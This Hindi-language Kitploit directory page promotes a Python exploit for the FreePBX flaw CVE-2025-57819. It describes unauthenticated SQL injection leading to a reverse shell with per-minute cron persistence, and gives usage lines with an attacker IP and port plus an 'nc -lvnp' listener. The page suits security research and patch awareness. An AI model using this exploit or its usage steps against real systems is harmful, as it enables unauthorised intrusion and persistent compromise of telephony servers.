Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cve-2025-57819-exploit — Python शोषण CVE-2025-57819 के लिए FreePBX को लक्षित करने वाला अप्रमाणित SQL इंजेक्शन के माध्यम से दूरस्थ कोड निष्पादन प्राप्त करने के लिए स्वचालित रिवर्स शेल और cron-आधारित स्थायित्व के साथ। | Kitploit
उपकरण/GitHubGitHub/its1zero/cve-2025-57819-exploit
स्थायित्व तंत्रभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगपेलोड डेवलपमेंट
GitHubits1zero/cve-2025-57819-exploit

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

cve-2025-57819-exploit

Python शोषण CVE-2025-57819 के लिए FreePBX को लक्षित करने वाला अप्रमाणित SQL इंजेक्शन के माध्यम से दूरस्थ कोड निष्पादन प्राप्त करने के लिए स्वचालित रिवर्स शेल और cron-आधारित स्थायित्व के साथ।

रिपॉजिटरी देखें
1 महीना पहलेअभी तक समीक्षित नहीं

CVE-2025-57819 शोषण

मेटाडेटा

  • गंभीरता: गंभीर (9.8)
  • वेक्टर: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • प्रकार: बिना प्रमाणीकरण के SQL इंजेक्शन → रिमोट कोड निष्पादन
  • प्रभावित सॉफ्टवेयर: FreePBX (एंडपॉइंट मॉड्यूल) < 15.0.66, < 16.0.89 और < 17.0.3
  • परीक्षण किया गया: CentOS 7 पर Apache 2.4 के साथ FreePBX 16.0.40.7

अवलोकन

यह स्क्रिप्ट एक कमजोर FreePBX एंडपॉइंट मॉड्यूल में CVE-2025-57819 का शोषण करती है। यह कमजोरी SQL इंजेक्शन की अनुमति देती है, जिसका उपयोग दुर्भावनापूर्ण क्रॉन जॉब्स इंजेक्ट करने के लिए किया जाता है।

अन्य सार्वजनिक शोषणों की तरह अपलोड किए गए वेबशेल के माध्यम से लक्ष्य के साथ इंटरैक्ट करने के लिए कोई अतिरिक्त कदम आवश्यक नहीं हैं। यह एक सीधा दृष्टिकोण है, जो आपको सीधे रिवर्स शेल एक्सेस देगा।

प्रभाव

SQL इंजेक्शन और क्रॉन जॉब हेरफेर के माध्यम से रिमोट कोड निष्पादन प्राप्त किया जाता है। सफल शोषण के परिणामस्वरूप लक्ष्य प्रणाली पर एक रिवर्स शेल प्राप्त होता है। कॉन्फ़िगरेशन के आधार पर, यह पूर्ण सिस्टम समझौता कर सकता है।

विशेषताएँ

  • कमजोर AJAX एंडपॉइंट के माध्यम से SQL इंजेक्शन
  • स्वचालित रिवर्स शेल पेलोड उत्पादन
  • हर मिनट निर्धारित निष्पादन के माध्यम से क्रॉन जॉब स्थायित्व (* * * * *)
  • इंजेक्टेड क्रॉन जॉब की स्वचालित सफाई
  • हेक्स-एन्कोडेड पेलोड का उपयोग करता है, क्योंकि base64 पेलोड तब दूषित हो जाते हैं जब + वर्णों को रिक्त स्थान के रूप में व्याख्यायित किया जाता है।

उपयोग

लक्ष्य और लिसनर कॉन्फ़िगरेशन प्रदान करके शोषण चलाएँ:

root@kitploit:~
python3 cve-2025-57819.py <target> <lhost> <lport>

पैरामीटर

  • <target>: लक्ष्य होस्टनाम या IP पता (कमजोर FreePBX इंस्टेंस)
  • <lhost>: रिवर्स शेल कॉलबैक के लिए हमलावर का IP पता
  • <lport>: आने वाले कनेक्शन के लिए सुनने वाला पोर्ट

उदाहरण:

root@kitploit:~
python3 cve-2025-57819.py freepbx.local 10.10.16.38 9999

लिसनर सेटअप

शोषण निष्पादित करने से पहले एक लिसनर प्रारंभ करें:

root@kitploit:~
nc -lvnp <port>

उदाहरण:

root@kitploit:~
nc -nlvp 9999

अस्वीकरण

यह उपकरण केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा परीक्षण के लिए है। स्पष्ट अनुमति के बिना सिस्टम के खिलाफ अनधिकृत उपयोग अवैध है। लेखक इस उपकरण के दुरुपयोग या क्षति के लिए कोई जिम्मेदारी नहीं लेता है।

लेखक

Its1Zero - [email protected]

संदर्भ

  • https://nvd.nist.gov/vuln/detail/cve-2025-57819
  • https://github.com/freepbx/security-reporting/security/advisories/ghsa-m42g-xg4c-5f3h
  • https://github.com/watchtowrlabs/watchTowr-vs-FreePBX-CVE-2025-57819
टूल डाउनलोड करें